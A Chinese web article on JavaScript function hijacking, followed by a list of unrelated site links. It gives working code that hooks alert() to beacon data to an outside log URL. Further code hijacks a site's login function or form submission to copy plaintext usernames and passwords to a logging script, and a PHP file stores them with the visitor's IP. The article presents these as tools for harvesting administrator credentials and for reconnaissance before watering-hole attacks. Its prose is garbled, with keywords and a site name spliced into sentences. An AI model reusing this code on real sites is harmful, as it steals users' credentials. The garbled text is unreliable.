- 当前位置:首页 >数据库 >JavaScript 函数劫持攻击原理
JavaScript 函数劫持攻击原理
发布时间:2025-11-05 09:20:43 来源:云智核 作者:IT科技
JavaScript 函数劫持并不是函数什么新颖的技术了。这两天在和同事吹牛的劫持过程中提到了这个,就简单地再回顾回顾,攻击以及假想在攻防的原理运用场景。
JavaScript 函数劫持(javascript hijacking)简介
一个简单的函数示例如下,主要逻辑就是劫持,用变量 _alert保存原函数 alert,攻击然后重写 alert 函数,原理在重写的函数函数最后调用原函数。这样得到的劫持一个效果就是调用 alert 的时候,可以往 alert 中加入其它操作。攻击比如如下代码中进行一个赋值。原理
<script type="text/javascript"> var _alert = alert; alert = function(){ var str = "啥也不是函数"; _alert(str); } alert(); </script>日志记录
这种编程技巧常用于开发中的日志收集与格式化。既然可以劫持函数加入自己的源码库劫持操作,那么就可以在比较隐蔽的攻击执行一些猥琐的操作。比如:
https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html
一文中提到的通过 Hook alert 函数来记录调用情况,或者弹一些警告信息,这样就可以记录到测试者的网络出口ip、浏览器指纹等信息也加上,没准就是日后的呈堂证供。
<script type="text/javascript"> function log(s) { var img = new Image(); imgimg.style.width = img.style.height = 0; img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s); } var _alert = alert; window.alert = function(s) { log(alert.caller); _alert(s); } </script>探针
在某些场景下,比如:已有权限,但是数据库中密码是加密的,无法解开。又或者需要探测目标人员访问此网站的规律。此时就可以利用劫持登录函数来记录明文的账号密码。如下示例:
onclick 事件会调用 login 函数发送请求包:
<form id="form1"> <input type="text" id="username" name="username"/><br> <input type="password" id = "password" name="password"/><br> <button id="submit" onclick="login()">submit</button><br> </form> <script> function login(){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; $.ajax({ url:"login.php", type:"POST", data:{ "username":username, "password":password }, success:function(){ alert(1); }, error:function(){ alert("error"); } }); } </script>可以劫持 login 函数,b2b信息网在发送登陆请求前,先发到探针文件中做一些记录帐号密码等操作。
var _login=login; login = function (){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; $.ajax({ url:"log.php", type:"POST", data:{ "username":username, "password":password }, success:console.log("1"), error:function(){ alert("error"); } }); }log.php 的内容如下:
<?php $username = $_POST["username"]; $password = $_POST["password"]; $ip = $_SERVER[REMOTE_ADDR]; file_put_contents("./log.txt",$username." ".$password." ".$ip);也许在实际中更常见的表单形式应该是下面这种。
<form id="form1" method="POST" action=“login.php”> <input type="text" id="username" name="username"/><br> <input type="password" id = "password" name="password"/><br> <input type="submit" id="submit" name="submit"/><br> </form>这种表单也可以通过小小的改动,很简单的记录到信息,下面使用的是 onsubmit 事件,用如下方式即可:
<script src="http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"> </script> <body> <form id="form1" method="POST" action=“login.php” onsubmit="return _login()"> <input type="text" id="username" name="username"/><br> <input type="password" id = "password" name="password"/><br> <input type="submit" id="submit" name="submit"/><br> </form> <script> function _login(){ var username = document.getElementById("username").value; var password = document.getElementById("password").value; $.ajax({ url:"log.php", type:"POST", data:{ "username":username, "password":password }, success:true, error:true }); } </script>不仅可以记录密码,还可以结合前面提到的记录日志,来记录管理员的登录时间、IP、UA 和浏览器指纹等信息。这种探针常用于布置水坑攻击前针对人员登录情况的信息收集,根据收集的信息制定具体的水坑方案。
源码下载- 电脑深度待机唤醒教程(实现高效省电的电脑待机状态)
- 口袋U盘装系统教程(简单、便捷、高效的Win7系统安装方法)
- 三星450R4J笔记本电脑的性能和特点(全面评测三星450R4J,让您了解这款笔记本电脑的一切)
- 以为沃和华为手机怎么样?(比较以为沃和华为手机的性能、价格和用户口碑)
- LOL电脑端新手教程(打造你的英雄传说,助你赢得荣耀)
- 大白菜iso装XP系统教程(简单易懂的操作步骤,轻松安装XP系统)
- 台式电脑密码设置的步骤和技巧(保护个人信息安全,合理设置台式电脑密码)
- 如何正确辨别苹果国行版型号的包装?(教你识别苹果国行版型号的包装特征,从而购买到正品手机)
- 电脑QQ时钟错误的原因和解决方法(探究电脑QQ时钟错误的根源,以及如何解决这一问题)
- 蓝牙5.0音质提升如何?
- USP无线网卡安装教程(详细指南帮助您轻松安装和使用USP无线网卡)
- 以格朗显示器的优势和特点(为什么以格朗显示器是您的最佳选择)
- 探究雅马哈音响的音质和性能(通过专业测试和用户反馈,揭示雅马哈音响的真实表现)
- 电瓶充电满了的后果(电瓶充电满了会发生什么?解析电瓶充满的影响和应对方法)
- 教你简易转换安卓手机m4a音频为mp3格式(一键操作,高效转换,享受更广泛的音频播放体验)
- 使用U盘制作系统盘教程(轻松制作可靠的系统盘,解决系统安装问题)
- 艾优尼i1(探索艾优尼i1的创新设计、强大性能和出色摄影功能)
- 华硕重装系统教程(轻松搞定华硕电脑重装系统,让你的电脑焕发第二春)
- 解决电脑网络651错误的有效方法(轻松解决651错误,快速恢复网络连接)
- 技嘉H81性能评测——优秀性价比的选择(一款适合办公和日常使用的主板推荐)
随便看看
- Copyright © 2025 Powered by JavaScript 函数劫持攻击原理,云智核 滇ICP备2023006006号-28sitemap